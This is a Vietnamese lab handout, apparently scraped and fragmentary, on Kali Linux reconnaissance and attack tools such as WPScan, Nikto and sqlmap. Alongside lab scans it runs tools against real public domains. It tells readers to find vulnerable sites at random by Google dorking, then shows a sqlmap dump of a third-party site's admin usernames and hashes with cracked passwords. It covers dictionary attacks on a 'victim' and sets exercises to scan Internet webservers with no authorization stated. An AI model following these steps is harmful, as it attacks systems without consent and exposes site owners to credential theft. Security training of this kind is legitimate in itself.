Professional Documents
Culture Documents
Lab 6
Lab 6
Lab 6
Công cụ theHarvester dựa vào nhiều nguồn tìm kiếm như google, google-profiles, bing,
Linkedin hoặc Shodan để thu thập thông tin. Ví dụ để thu thập thông tin về một công ty
ABC nào đó, NSD có thể tìm địa chỉ email, tên máy chủ và nhiều thông tin liên quan đến
công ty đó bằng theHarvester.
Thực hành các lệnh sau khi máy có kết nối internet
user01@VMKali:~$ theharvester -d www.facebook.com -l 500 -b google
DMitry (Deepmagic Information Gathering Tool) có chức năng lookups thông tin
domain website, thu thập thông tin của domain phụ, địa chỉ email, thông tin về thời gian
hoạt động, quét cổng TCP, tìm kiếm whois, v.v .
Chức năng:
• Thu thập địa chỉ email trên một host.
2) Xem các thông tin Internet Number bao gồm: địa chỉ IP, số hiệu mạng ASN
user01@VMKali:~$ dmitry -i www.google.com
Uniscan có thể quét được các lỗi thường gặp của một website như LFI, RFI, SQL
Injection, XSS ... Uniscan được viết bằng Perl.
1) Quét lỗi của một website:
kali@VMKali:~$ sudo uniscan -u http://192.168.1.10/mutillidae/ -qweds
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3)With great power comes great responsibility.
[sudo] password for 102170044:
####################################
# Uniscan project #
# http://uniscan.sourceforge.net/ #
####################################
V. 6.3
Scan date: 25-1-2021 20:45:18
==========================================================================================
=========
| Domain: http://192.168.1.10/mutillidae/
| Server: Apache/2.4.41 (Debian)
| IP: 192.168.1.10
==========================================================================================
=========
|
| Directory check:
| [+] CODE: 200 URL: http://192.168.1.10/mutillidae/ajax/
| [+] CODE: 200 URL: http://192.168.1.10/mutillidae/classes/
| [+] CODE: 200 URL: http://192.168.1.10/mutillidae/data/
| [+] CODE: 200 URL: http://192.168.1.10/mutillidae/images/
| [+] CODE: 200 URL: http://192.168.1.10/mutillidae/includes/
| [+] CODE: 200 URL: http://192.168.1.10/mutillidae/javascript/
| [+] CODE: 200 URL: http://192.168.1.10/mutillidae/phpmyadmin/
| [+] CODE: 200 URL: http://192.168.1.10/mutillidae/styles/
…
|
| Crawler Started:
| Plugin name: Web Backdoor Disclosure v.1.1 Loaded.
| Plugin name: FCKeditor upload test v.1 Loaded.
| Plugin name: Upload Form Detect v.1.1 Loaded.
| Plugin name: phpinfo() Disclosure v.1 Loaded.
| Plugin name: External Host Detect v.1.2 Loaded.
| Plugin name: Code Disclosure v.1.1 Loaded.
| Plugin name: E-mail Detection v.1.1 Loaded.
| Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
^C[*] Crawling: [247 - 316]
…
user01@VMKali:~# uniscan -u https://www.toto.com/ -qweds
>> Thay thế www.toto.com bằng một tên miền của Website trên Internet
Nikto là một phần mềm mã nguồn mở được sử dụng kiểm tra các vấn đề bảo mật của
Web Server bằng một hệ thống cơ sở dữ liệu riêng đến khoảng 70 ngàn lỗi bảo mật thông
thường được tìm thấy và cập nhật với từng phiên bản. Các lỗ hổng bảo mật mà Web Server
thường gặp phải như : các cấu hình phía dịch vụ máy chủ hoặc phần mềm sai sót, các
chương trình hay file mặc định được tìm thấy, các chương trình hay file không an toàn được
tìm thấy, những lỗ hổng cơ bản ở ứng dụng web,..
1) Xem thông tin về nikto.pl
user01@VMKali:~# nikto
2.6 Công cụ darkjumper kiểm tra lỗi bảo mật các trang Web
Darkjumper thực hiện tìm từng trang web cùng lưu trữ tại một máy chủ chung. Sau đó sẽ
kiểm tra lỗi bảo mật của từng trang web trên máy chủ.
Chức năng:
• Quét các lỗi như SQL Injection, Remote File Inclusion, Local File Inclusion.
• Định danh các user trên server.
wget http://ignum.dl.sourceforge.net/project/darkjumper/darkjumper.v5.7.tar.gz
mv darkjumper.v5.7 /darkjumper.v5.7
user01@kali:/darkjumper.v5.7$
4) Để có thể định danh các người dùng (user) trên máy chủ:
user01@kali:/darkjumper.v5.7$ sudo ./darkjumper.py -t 192.168.1.115 -m enum
5) Để kiểm tra xem máy chủ FTP có cho phép người dùng nặc danh truy cập hay không:
user01@kali:/darkjumper.v5.7$ sudo./darkjumper.py -t 192.168.1.10 -m anon
2.7 Công cụ WPScan Tool quét các lỗ hổng bảo mật trên WordPress
WPScan được viết trên ngôn ngữ Ruby. WPScan thường được các chuyên gia bảo mật
và các quản trị viên của WordPress sử dụng để kiểm tra các lỗi bảo mật.
Tính năng của WPScan:
• Thu thập các tên đăng nhập trên WordPress.
1) Quét những thông tin cơ bản trên Wordpress (-u): các đường dẫn thư mục trên máy chủ
web, thu thập thông tin phiên bản Wordpress, lấy các thông tin HTTP Response như tên máy
chủ
user01@VMKali:~$ wpscan –u optinmonster.com
3) Quét các giao diện có lỗ hổng bảo mật trên WordPress (--enumerate -vt)
user01@VMKali:~$ wpscan --enumerate -vt optinmonster.com
Nếu WPScan tìm được lỗ hổng trong giao diện WordPress thì xuất hiện dấu chấm than màu
đỏ trong kết quả dòng lệnh được xuất ra.
4) Quét các plugin trên WordPress ( --enumerate -p)
user01@VMKali:~$ wpscan --enumerate -p optinmonster.com
5) Quét các plugin trên WordPress có những lỗ hổng bảo mật như SQL Injection, XSS,...
( --enumerate -vp)
user01@VMKali:~$ wpscan --enumerate -vp optinmonster.com
Nếu WPScan tìm được lỗ hổng trong giao diện WordPress thì xuất hiện dấu chấm than màu
đỏ trong kết quả dòng lệnh được xuất ra.
6) Thu thập được các tên đăng nhập WordPress (--enumerate u)
user01@VMKali:~$ wpscan --enumerate -u optinmonster.com
2.8 Công cụ Joomscan quét các lỗ hổng bảo mật trên Joomla Website
Joomscan là một công cụ dùng để tìm lỗ hổng bảo mật trên hệ thống quản trị nội dung
(CMS) Joomla và được các nhà phát triển (developer) web sử dụng để tìm lỗ hổng bảo mật
trên website. Joomscan được viết trên ngôn ngữ Perl. Joomscan phát hiện được các lỗi trên
Joomla như SQL Injection, XSS và CSRF. Phiên bản cập nhật của Joomscan có thể phát
hiện 550 lỗ hổng bảo mật.
Một vài tính năng của Joomscan:
§ Tìm kiếm các lỗ hổng bảo mật của Joomla và thành phần (component) của
Joomla.
§ Xuất kết quả ra định dạng .txt và .html.
§ Phát hiện ứng dụng web tường lửa của Joomla.
8) Quét lỗ hổng bảo mật của Website Joomla
user01@VMKali:~$ joomscan –u websitejoomla.com
Nếu phát hiện được lỗ hổng nào thì ngay tại Vulnerable sẽ là Yes, ngược lại sẽ là No
9) Sử dụng proxy khi quét:
user01@VMKali:~$ joomscan -u websitejoomla.com -x địa_chỉ_proxy:cổng
2.9 Công cụ tlssled
2.10 Công cụ sslscan liệt kê các bộ mã hóa và chứng chỉ trên máy chủ
user01@VMKali:~$ sslscan 192.168.1.10
2.11 Công cụ OpenSSL
user01@VMKali:~# echo -n | openssl s_client -connect www.google.com:443
2.12 Công cụ nmap
3) Aggressive scanning:
nmap -A 192.168.56.103
___
__H__
___ ___[']_____ ___ ___ {1.4.3.11#dev}
|_ -| . ['] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent
is illegal. It is the end user's responsibility to obey all applicable local, state and
federal laws. Developers assume no liability and are not responsible for any misuse or damage
caused by this program
[*] starting @ 21:16:13 /2021-01-25/
[21:16:19] [INFO] testing connection to the target URL
got a refresh intent (redirect like response common to login pages) to
'http://192.168.0.4/login/index.php'. Do you want to apply it from now on? [Y/n] Y
you have not declared cookie(s), while server wants to set its own ('MOODLEID_=%25ED
%25C3%...51CC%25B7d;MoodleSession=vs2s0rtrgk7...ufg9bd4501;MoodleSessionTest=tD8xS1AFVh'). Do
you want to use those [Y/n] Y
[21:16:35] [CRITICAL] previous heuristics detected that the target is protected by some
kind of WAF/IPS
[21:16:35] [INFO] testing if the target URL content is stable
[21:16:35] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will
base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are
detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[21:16:38] [INFO] searching for dynamic content
[21:16:39] [CRITICAL] target URL content appears to be heavily dynamic. sqlmap is going to
retry the request(s)
[21:16:41] [WARNING] target URL content appears to be too dynamic. Switching to '--text-
only'
[21:16:41] [INFO] testing if GET parameter 'id' is dynamic
[21:16:41] [WARNING] GET parameter 'id' does not appear to be dynamic
[21:16:41] [INFO] testing for SQL injection on GET parameter 'id'
[21:16:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:16:44] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[21:16:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)'
[21:16:46] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[21:16:47] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING
clause (IN)'
[21:16:49] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[21:16:50] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[21:16:51] [INFO] testing 'Generic inline queries'
[21:16:51] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[21:16:52] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[21:16:53] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[21:16:54] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[21:16:56] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[21:16:58] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[21:16:59] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other
(potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[21:17:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[21:17:10] [WARNING] GET parameter 'id' does not seem to be injectable
[21:17:10] [CRITICAL] all tested parameters do not appear to be injectable. Try to
increase values for '--level'/'--risk' options if you wish to perform more tests. If you
suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could
try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
….
2.13.2 Khai thác các lệnh sqlmap với website www.abc.com
1) Tìm 1 trang lỗi SQL Injection bất kì trên Google bằng cách tìm kiếm với từ khóa inurl
php?id=
Ví dụ có kết quả dạng: http://www.abc.com/product.php?id=200
2) Kiểm tra lỗi SQL Injection
http://www.abc.com/product.php?id=200’
5) Chọn 1 tables cần trích xuất thông tin. Lấy thông tin các cột trong đó
user01@kali:~$ python /sqlmap/sqlmap.py -u http://www.abc.vn/index.php?id=320
-D tên_database -T tên_bảng –columns
Ta có được list các bảng của database này. Ta thấy bảng account là 1 bảng chứa những
thông tin quan trọng nên ta sẽ tập trung khai thác bảng này.
c. Lấy ra các column trong bảng account
user01@kali:~$ python /sqlmap/sqlmap.py -u
http://toto.com.vn/constructionDetail.php?id=334 -D toto -T account --columns
Đây là danh sách các column trong bảng này. Ta thấy có 2 column quan trọng là
username và user_password ở đây nên hãy thử tấn công để tìm ra 2 thông tin này
d. Cho ra danh sách username và password
user01@kali:~$ python /sqlmap/sqlmap.py -u
http://toto.com.vn/constructionDetail.php?id=334 -D toto -T account -C
username,user_password --dump
[17:44:20] [INFO] used SQL query returns 2 entries
[17:44:20] [INFO] retrieved: 'b0d38fb7d75823691b324f4df8bbea06','Administrator'
[17:44:20] [INFO] retrieved: '7d27e2e42ebb5a8e51e124cb18c29352','AdminToto'
[17:44:20] [INFO] recognized possible password hashes in column
'user_password'
do you want to store hashes to a temporary file for eventual further processing with other
tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: toto
Table: account
[2 entries]
+---------------+----------------------------------+
| username | user_password |
+---------------+----------------------------------+
| Administrator | b0d38fb7d75823691b324f4df8bbea06 |
| AdminToto | 7d27e2e42ebb5a8e51e124cb18c29352 |
+---------------+----------------------------------+
Kết quả đã có username và password mã hóa MD5. Thử decrypt 2 đoạn mã này sử dụng
các công cụ hiện có trên mạng và kết quả là mật khẩu cho Administrator là webrand và cho
AdminToto là LPadmind.
NSD cũng có thể tấn công các table quan trọng khác trong database này để lấy được
thông tin mình muốn.
2.13.4 Công cụ sqlmap GUI
user01@vmkali:~# python /usr/share/sqlmap/sqlmapapi.py -s
CrossSite Scripter (XSSer) là một công cụ tự động hóa nhằm tìm cách phát hiện và khai
thác lỗ hổng cho các tập lệnh trực tuyến trong các ứng dụng web và trang web. Ngoài ra còn
có một số tùy chọn để tránh phát hiện XSS.
To list all the features XSSer Package “xsser -h”
root@kali:~# xsser -h
2.15 Công cụ Skipfish – Web Application Security Scanner for XSS, SQL Injection,
Shell injection
Step1: To get all the parameters of type skipfish -h
root@kali:~# skipfish -h
Step2: To scan the target and to write the output in the directory.
root@kali:~# skipfish -d -o 202 http://192.168.169.130/
2.16 Công cụ Amap
Amap is a tool that can be used to check the application running on a specific port:
102170044@kali:~$ amap -bq 192.168.1.10 22 80 143
amap v5.4 (www.thc.org/thc-amap) started at 2021-01-25 21:19:20 - APPLICATION MAPPING mode
Protocol on 192.168.1.10:22/tcp matches ssh - banner: SSH-2.0-OpenSSH_7.9p1 Debian-
10\r\nProtocol mismatch.\n
Protocol on 192.168.1.10:22/tcp matches ssh-openssh - banner: SSH-2.0-OpenSSH_7.9p1
Debian-10\r\nProtocol mismatch.\n
Protocol on 192.168.1.10:80/tcp matches http - banner: HTTP/1.1 200 OK\r\nDate Tue, 26 Jan
2021 021920 GMT\r\nServer Apache/2.4.41 (Debian)\r\nLast-Modified Wed, 30 Jan 2019 071229
GMT\r\nETag "29cd-580a7a1fa9140"\r\nAccept-Ranges bytes\r\nContent-Length 10701\r\nVary
Accept-Encoding\r\nConnection close\r\nC
Protocol on 192.168.1.10:80/tcp matches http-apache-2 - banner: HTTP/1.1 200 OK\r\nDate
Tue, 26 Jan 2021 021920 GMT\r\nServer Apache/2.4.41 (Debian)\r\nLast-Modified Wed, 30 Jan
2019 071229 GMT\r\nETag "29cd-580a7a1fa9140"\r\nAccept-Ranges bytes\r\nContent-Length
10701\r\nVary Accept-Encoding\r\nConnection close\r\nC
amap v5.4 finished at 2021-01-25 21:19:27
DNSenum cho phép ta lấy được rất nhiều thông tin hữu ích của một domain như:
· Lấy bản ghi địa chỉ IP của domain (bản ghi A).
· Lấy nameservers (bản ghi NS).
· Lấy mailserver (bản ghi MX).
· Thực hiện truy vấn AXFR (all zone transfer) trên các nameservers vừa lấy
được.
· Lấy các subdomain từ google (sử dụng truy vấn “allinurl: -www site:domain”).
· Thực hiện Brute force các subdomain từ file thư viện cho trước. (Ngoài ra, các
bạn cũng có thể brute force subdomains mà không cần file thư viện bằng công cụ
dnsmap mình đã giới thiệu ở bài trước.)
· Tính toán các dải ip lớp C và thực hiện truy vấn whois trên các dải ip đó.
· Ghi lại file domain_ips.txt
Xem những thông tin bản ghi DNS cơ bản và xuất file xml:
user01@kali:~# dnsenum thekalitools.com --noreverse -o thakalitools.xml
2.18 Hash-Identifier
Hash-identifier là một công cụ được tích hợp sẵn trên Kali Linux, giúp ta phân biệt kiểu
thuật toán mã hóa của một chuỗi hash bất kỳ. Chỉ với một tham số đầu vào công cụ này so
với các quy tắt mã hóa của từng thuật toán và xuất ra cho ta biết có thể là được chuỗi hash
này "có thể" được mã hóa bằng thuật toán nào.
Visualroute là một tool Tracer rất hiệu quả với giao diện trực quan với nhiều chức năng
như Graphical View, định vị IP, lookup... là công cụ khá mạnh và dễ sử dụng.
Ta nhập thông tin IP hoặc domain muốn test và bấm Trace
Tiến trình hoạt độn của VisualRoute như sau
Trong quá trình Run ta có thể chọn chế độ chạy như Run one, Run every one,Run
Continuously.. sau khi hoàn thành các bản dữ liệu xuất ra thông tin rõ ràng, có thể chọn chế
độ hiển thị để xem.
Analysis : Chức năng này với mục đích phân tích đích đến khu vực nào, thông tin tổng thể
như port, local, loại Fireware, lookup thông tin DNS...
Map : Show vị trí IP từ nguồn đến đích trên bảng đồ, người thực hiện scan có thể biết được
mục tiêu nằm ở vị trí nào trên map, không những năm rõ IP mà vẫn biết được local địa lý.
Router Graph: Liệt kê lên hình các danh sách IP trong quá trình scan từ nguôn đến đích từ
IP local đến IP đích khá chi tiết, nếu hệ thống mạng nào có Fireware hay không, tool cũng
có thể nhận diện được và cũng có thể nhận diện tên của Fireware đó.
Table : Liệt kê danh sách các IP từ nguồn đến đích và hỗ trợ xác định IP thuộc ISP nào cung
cấp, vị trí kiểm tra độ trễ ...
Trace Route ping plot : Giúp giải quyết các vấn đề về mạng. Đó là công cụ chẩn đoán mạng
biểu thị thời gian trễ và mất gói giữa máy tính của bạn và mục tiêu. Hình dung thông tin
tăng tốc quá trình xử lý sự cố của bạn và giúp xây dựng một trường hợp nếu bạn cần thuyết
phục người nào đó có vấn đề tồn tại vào cuối của họ.
History : Cho biết thông tin những đích nào đã scan qua, tổng hợp lịch sử tool đã chạy, chức
năng này hỗ trợ truy vấn tìm kiếm lịch sử theo thời gian thực hiện, khá tiện ích khi tìm lại
nội dung trước đó
Omnipath: Khi quá trình scan ping từ nguồn đến đích, omnipath này có nhiệm vụ kiểm tra
chi tiết từng node, từng để đến và phân tích chi tiết từng node này như avg, min,max...
VisualRoute hỗ trợ nguồn scan, có thể từ máy tính hoặc một số nới, có thể thêm nguồn để
tiến hàng scan. Và trong quá trình scan có thể thể lựa chọn các option phù hợp để quá trình
quét.
Path Analyzer Pro có khả năng kiểm tra theo dõi hiệu suất, DNS, whois, và độ phân giải
mạng để điều tra các vấn đề về mạng. Bằng cách tích hợp tất cả các tính năng mạnh mẽ này
vào một giao diện đồ họa đơn giản, Path Analyzer Pro đã trở thành công cụ cần thiết cho bất
kỳ chuyên gia bảo mật và hỗ trợ trên Microsoft Windows ,MacOS X ,Debian,RedHat ...
Giao diện phần mềm có 3 option nổi bật :
-Standard Options
-Advanced Probe Details
-Advanced Tracing Details.
1) Standard Options :
Phần này tool hỗ trợ cho bạn lựa chọn 3 Protocol : ICMP, TCP, UDP
2) Advanced Probe Details :
§ Length of packet : Độ dài của tập tin, mặc định là 64 bytes
§ Lifetime : Thời gian gói tin khi gởi đi, nếu quá thời gian không nhận được phản
hồi thì xác định nó chết.
§ Type-of-Service
§ Unspecified : Số trường không được điền vào
§ Minimize-Delay : Xác định độ trễ tập tin sẽ hỗ trợ tập tin gởi đi nhanh hơn
§ Maximum TTL : là thời gian mà nameserver khác được cập nhật lại, tính theo
giây
3) Advanced Tracing Details :
§ Work-ahead Limit : giới hạn thời gian nameserver cập nhật lại
§ Minimum Scatter : dùng để đặt thời gian tối thiểu để tạm dừng giữa việc gửi đầu
dò
Phương thức scan :
Target : Mục tiêu cần scan
Port : Port scan có thể chọn mart để chạy tự động.
Thời gian : Có 3 lựa chọn về mặt thời gian (On-time Trace : Scan 1 lầnlần, Timed Trace :
Đặt lích scan vàContinuous Trace : Sẽ chạy mãi mãi đến khi có yêu cầu dừng).
2.21 Automater Kali Linux - Công cụ phân tích website, Md5 Hash OSINT
Automater Kali linux là công cụ phân tích đánh giá website dựa theo IP, URL domain hoặc
kiểm tra chuỗi MD5 hash ... phân tích kiểm tra phát hiện tìm file hoăc đoạn code mã hoá
nguy hiểm chứa mã độc...
Option :
-h, --help : show trợ giúp
-o OUTPUT, --output OUTPUT : ghi file nội dung xử lý xong
-b, --bot : Đưa ra kết qua
-f CEF, --cef CEF : Xuất file định dạng CEF
-w WEB, --web WEB :Xuất file html
-c CSV, --csv CSV : Xuất file csv
-d DELAY, --delay DELAY : Thay đổi Delay
-s SOURCE, --source SOURCE : Xuất ra xml
--proxy PROXY : Thiết lập proxy
Cấu trúc -o output tương ứng với file được lưu (output : tên file), muốn xem file đã lưu
vào đường dẫn của Automater.
user01@bad:/usr/share/automater
Acccheck là công cụ được thiết kế như một cuộc tấn công bằng mật khẩu từ danh sách
các từ điển có sẵn nhằm mục đích xác thực cửa sổ thông qua giao thức SMB. Thực hiện
theo một kịch bản có sẵn là bộ từ điển user / password vào 'smbclient' nhị phân và xuất ra
kết quả trong quá trình kiểm tra.
Cách 1: Scan với thư viện có sẵn hoặc tạo thư viên, tạo file ListIP.txt, username.txt,
password.txt
user01@bad:~# touch ListIP.txt
Run : acccheck -T(T hoa để hiểu nhập tên file) ListIP.txt -u username.txt -p password.txt
Acccheck sẽ tự động scan danh sách từ các file từ điển tương ứng để xác thực thông tin
đúng hay không.
Cách 2 : Dự đoán thông tin nạn nhân, cách này đoán nạn nhân sẽ sử dụng IP 192.168.1.107
và có user administrator hoặc admin hoặc phamquangloc ... Từ đây sẽ nhập thông tin trực
tiếp.
user01@bad:~# acccheck -t 192.168.1.107 u- administrator -p password.txt
...
[3389][rdp] host: 192.168.1.16 login: admin password: 123456
...
kali@kali:~$
...
[22][ssh] host: 192.168.1.10 login: user01 password: 123456
...
3. BÀI TẬP
1) Khai thác và sử dụng các công cụ của Kali để quét thông tin một WebServer trên
Internet.
2) Khai thác và sử dụng các công cụ của Kali để quét các lỗ hổng của một
WebServer trên Internet.
3) Khai thác các công cụ khác của Kali Linux.